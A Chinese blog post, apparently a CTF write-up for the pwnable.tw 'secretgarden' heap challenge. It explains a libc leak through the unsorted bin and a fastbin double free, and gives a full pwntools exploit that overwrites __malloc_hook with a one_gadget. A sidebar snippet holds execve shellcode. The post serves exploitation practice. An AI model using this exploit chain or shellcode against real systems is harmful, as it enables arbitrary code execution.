【fast bin dup + house of spirit】pwnable_secretgarden

最新推荐文章于 2021-11-10 13:36:35 发布
最新推荐文章于 2021-11-10 13:36:35 发布
阅读量92 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/117093728
版权

【fast bin dup + house of spirit】

1.ida 分析

  1. add函数没什么问题

    在这里插入图片描述

    1. remove函数,在free之前没有对结构体中的标志位进行检验,可以进行double free,free后没有置空,存在指针悬挂

      在这里插入图片描述

2.思路

  1. 利用unstored bin泄露libc的地址

    1. 申请大chunk并释放

      在这里插入图片描述

    2. 在我们从ustored bin中申请堆块的时候,如果申请的是small bin大小的堆块,那么会先从unstored bin中分割出符合size的堆块,放入到small bin中,再从中取出,取出的堆块中的内容其实是含有,main_area相关的地址的

                  // 放到对应的 bin 中,构成 bck<-->victim<-->fwd。
            mark_bin(av, victim_index);
            victim->bk = bck;
            victim->fd = fwd;
            fwd->bk    = victim;
            bck->fd    = victim;

      在这里插入图片描述

  2. 通过利用double free实现house of spirit,打malloc_hook

    1. 由于没有检查堆块的存在位,正常释放chunk4,chunk5,看一下bin的情况

      在这里插入图片描述

    2. 再次释放chunk4,就能得到两个bin指向同一个地址

      在这里插入图片描述

    3. 第一次申请,能够修改last bin的fd指针为malloc_hook上方的fake chunk

      在这里插入图片描述

    4. 再申请两次就能将chunk申请到fake chunk的上方,将malloc_hook改为onegadget

      在这里插入图片描述

3.exp

from pwn import *
# challenge informatp.
context(arch='amd64',os='linux',log_level='debug')
myelf  = ELF("./secretgarden")
libc   = ELF("./libc_64.so.6")
#p     = process(myelf.path,env={"LD_PRELOAD" : libc.path})
p = process(myelf.path)
#p = remote('chall.pwnable.tw', 10203)
# local libc
local_libc_64  = ELF("/lib/x86_64-linux-gnu/libc.so.6")
local_libc_32  = ELF("/lib/i386-linux-gnu/libc.so.6")

# functp.s for quick script
s       = lambda data               :p.send(data)       
sa      = lambda delim,data         :p.sendafter(delim, data) 
sl      = lambda data               :p.sendline(data) 
sla     = lambda delim,data         :p.sendlineafter(delim, data) 
r       = lambda numb=4096          :p.recv(numb)
ru      = lambda delims             :p.recvuntil(delims)

# misc functp.s
uu32    = lambda data   :u32(data.ljust(4, b'\0'))
uu64    = lambda data   :u64(data.ljust(8, b'\0'))
leak    = lambda name,addr :log.success('{} : {:#x}'.format(name, addr))

def add(size,name,color):
    sla('Your choice ','1')
    sla('Length of the name :',str(size))
    sla('The name of flower :',name)
    sla('The color of the flower :',color)

def remove(index):
    sla('Your choice : ','3')
    sla('Which flower do you want to remove from the garden:',str(index))

def show():
    sla('Your choice : ','2')

def remove_all():
    sla('Your choice : ','4')

def debug():
    gdb.attach(p)
    pause()
#unstored bin leak
add(0x100,'index0','index0') #0
add(0x10,'index1','index1') #1
remove(0)
add(0x10,'b'*7,'index2')
show()
libc_base = uu64(ru('\x7f')[-6:]) - local_libc_64.sym['__malloc_hook'] - 0x68
log.success('libc_base ==>'+hex(libc_base))
add(0x80,'padding','padding')
#double free
add(0x60,'index4','index4')
add(0x60,'index5','index5')
remove(4)
remove(5)
remove(4)
add(0x60,p64(libc_base + local_libc_64.sym['__malloc_hook']-0x23),'index6')
add(0x60,'index7','index7')
add(0x60,'index8','index8')
add(0x60,'b'*0x13+p64(libc_base+0x4f226),'system')
debug()
remove(0)
remove(0)


p.interactive()
huzai9527
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AttributeError: module ‘_winapi‘ has no attribute ‘SYNCHRONIZE‘解决方案
weixin_43178406的博客
12-21 4万+
本文主要介绍了AttributeError: module ‘_winapi’ has no attribute 'SYNCHRONIZE’解决方案,希望能对使用loky的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
PWN horcruxes [pwnable.kr]CTF writeup题解系列15
重新启程
01-06 818
题目内容: 先连接上去看看题目文件,看起来已经说了是一道rop的题目 root@mypwn:/ctf/work/pwnable.kr# ssh horcruxes@pwnable.kr -p2222 horcruxes@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ ...
pwnable md5 calculator(随机数生成)
九层台
09-28 487
开启了canary和NX保护 int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax int v5; // [esp+18h] [ebp-8h] int v6; // [esp+1Ch] [ebp-4h] setvbuf(stdout, 0, 1, 0);...
free_spirit(在栈上爆破一个可以被free的fake_chunk)
seaaseesa的博客
07-01 401
free_spirit(在栈上爆破一个可以被free的fake_chunk) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,功能3存在8字节溢出,将会把v7下面的buf指针覆盖掉,而覆盖了buf指针,就能实现任意地址写。 那么,我们劫持函数栈返回地址为one_gadget即可,为了绕过结尾对buf的检查,我们的buf非0,且free后不会报错。 但是我们泄露不了堆地址,因此,只能在栈上找一个合适的fake_chunk,因此,可以直接在栈上爆破,直到程序不崩溃,那..
好好说话之Tcache Attack(2):tcache dup与tcache house of spirit
hollk’s blog
02-02 1846
这篇文章介绍了两种tcache的利用方法,tcache dup和tcache house of spirit,两种方法都是用how2heap中的例题作为讲解。由于tcache attack这部分的内容比较多,所以分开几篇文章去写。例题后补,写完例题后可能会进行重新排版,内容不会少的!!!
关于 dup2(fd[0],STDOUT_FILENO) 的一些波折
u013622503的博客
11-15 3833
在看 unix 环境高级编程 的时候,在管道这一部分,还没有看到后面的代码时,一直被一个问题困扰着。先看代码 //15-6 #include "apue.h" #include &lt;sys/wait.h&gt; #define DEF_PAGER "/bin/more" /* default pager program */ int main(int argc, char *argv...
DUP_VAL_ON_INDEX 作用和用法
duyanyong的专栏
09-16 1万+
在写PROCEDURES的时候,INSERT和UPDATE是经常碰到的处理. 有时候会要求对表进行INSERT的时候,如果里面已经有了与该条值的KEY值相同的数据,则对该条数据进行UPDATE处理. 方法是在EXCEPTION 里面加WHEN DUP_VAL_ON_INDEX THEN来进行判断... 这时候需要注意的是,如果直接在那个下面进行UPDATE处理的时候,虽然编译是可以通过的.
dupdup2的使用方法
lurendetiankong的博客
12-06 1万+
/*本文通过标准输出的重定向和恢复的过程来解释dupdup2的使用方法*/ #include #include #include //STDIN_FILENO标准输入描述符(0) //STDOUT_FILENO标准输出描述符(1) //STDERR_FILENO标准错误描述符(2) int main(void) { int n_fd; int s_fd; int
Mongo ID主键重复 _id_ dup key
风雨断肠人——博客
02-04 1万+
今天在开发中遇到Mongo主键重复,查询网上关于Mongo主键未找到相关解释,经后续仔细排查项目上使用Mongo的细节,发现项目上使用了数据版本。由于Mongo本身未支持事务操作,故项目中使用了 /** * 版本 */ @Version private Long optlock; , org.springframework.data.annotation.Version 在
linux之dupdup2函数解析
热门推荐
倚楼听风雨的博客
05-03 7万+
本文转载,原文地址:http://blog.csdn.net/fulinus/article/details/9669177#comments1、文件描述符在内核中数据结构  在具体说dup/dup2之前,我认为有必要先了解一下文件描述符在内核中的形态。一个进程在此存在期间,会有一些文件被打开,从而会返回一些文件描述符,从shell中运行一个进程,默认会有3个文件描述符存在(0、1、2),0与进程的
dup2 - FilePlanet_visualc++_
10-03
标题中的"dup2"是一个Unix/Linux系统调用,它允许一个已存在的文件描述符(file descriptor)替换另一个文件描述符。在Windows环境下,这个概念可能不太常见,因为它的API更倾向于使用函数如CreateFile和CloseHandle...
Test_dup2_x2.rar_android
09-24
`Test_dup2_x2.rar_android`这个压缩包可能包含了一组用于测试特定功能的代码,尤其是与数据库操作相关的部分,因为"Cursor Wrapper Test"通常涉及到对SQLite数据库查询结果的封装和测试。下面我们将深入探讨这些...
DUP_MOSAIC.zip_We Two
07-15
matlab code for mosaicing of two images.here we use homography and ransac for mosaicng of two images.
find_dup_1.zip_Duplicate Text
09-14
"find_dup_1.zip_Duplicate Text"这个项目就是针对这个问题的一个实例。它使用了一种名为`find_dup.awk`的Awk脚本来查找和处理文本文件中重复的行。Awk是一种强大的文本分析工具,尤其适用于处理结构化数据,如CSV或...
Test_dup_x2.rar_The Test
09-14
在这个名为"Test_dup_x2.rar_The Test"的压缩包中,我们有两个源代码文件:AddAdapter.c 和 Test_dup_x2.c,它们可能涉及到适配器模式的应用。以下是关于适配器模式及其相关知识点的详细解释。 适配器模式的主要...
ctf-pwn-patchelf-用题目给的libc运行二进制文件
huzai9527的博客
07-07 5267
用给定的libc进行调试 首先根据题目给你的libc,查找相应版本的连接器 然后去glibc-all-in-one中下载相应的ld文件 glibc-all-in-one安装步骤 https://github.com/matrix1001/glibc-all-in-one 使用 查看各unbuntu版本的glibc ./update_list cat list 下载对应版本的glibc ./download 2.27-3ubuntu1_amd64 下载好的glibc在l
[_IO_FILE] 原理解析
huzai9527的博客
11-10 3699
FSOP CFF-WIKI中有如下描述 FSOP 的核心思想就是劫持_IO_list_all 的值来伪造链表和其中的_IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP 选择的触发方法是调用_IO_flush_all_lockp,这个函数会刷新_IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用_IO_FILE_plus.vtable 中的_IO_overflow。 触发条件 梳理一下 FSOP 利用的条件,首先需
IDA修复跳表
huzai9527的博客
11-08 1896
一、 IDA打开遇到JUMP CS命令 这是由于GCC在编译超过5个switch的结构时会用跳表进行优化,变成上面的样子 二、使用EDIT --> other --> specify switch 将光标打在JUMP命令上按TAB键切换到汇编,然后才能进行编辑 我解释一下各个参数的意义 Address of Jump table:跳表的地址,cmp eax 5,之后跳到的地址,这里就是0x69E0 Number of elements:switch 的个数,先前cmp eax 5,加
orw_shellcode_模板
huzai9527的博客
05-23 1552
orw 64位 shellcode shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" #pwntools context.arch = elf.arch shellcode = asm(shellcreaft.sh()) orw #pwntools shellcode = '' shellcode += shellcraft.open
len_feature=app_desire.shape[0] dup_col=[] for m in range(len_feature): for n in range(m+1,len_feature): if app_desire.iloc[m,n]&(app_desire.columns[n] not in dup_col): dup_col.append(app_desire.columns[n]) print('需要删除的列为:',dup_col) all_info.drop(dup_col,axis=1,inplace=True) print('删除多余列后all的特征数目为:',all_info.shape[1]) 每行代码注释
最新发布
05-25
dup_col = [] # 遍历所有特征 for m in range(len_feature): for n in range(m+1, len_feature): # 如果存在重复值并且该列未被记录,则将该列加入重复列列表 if app_desire.iloc[m, n] and (app_desire....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值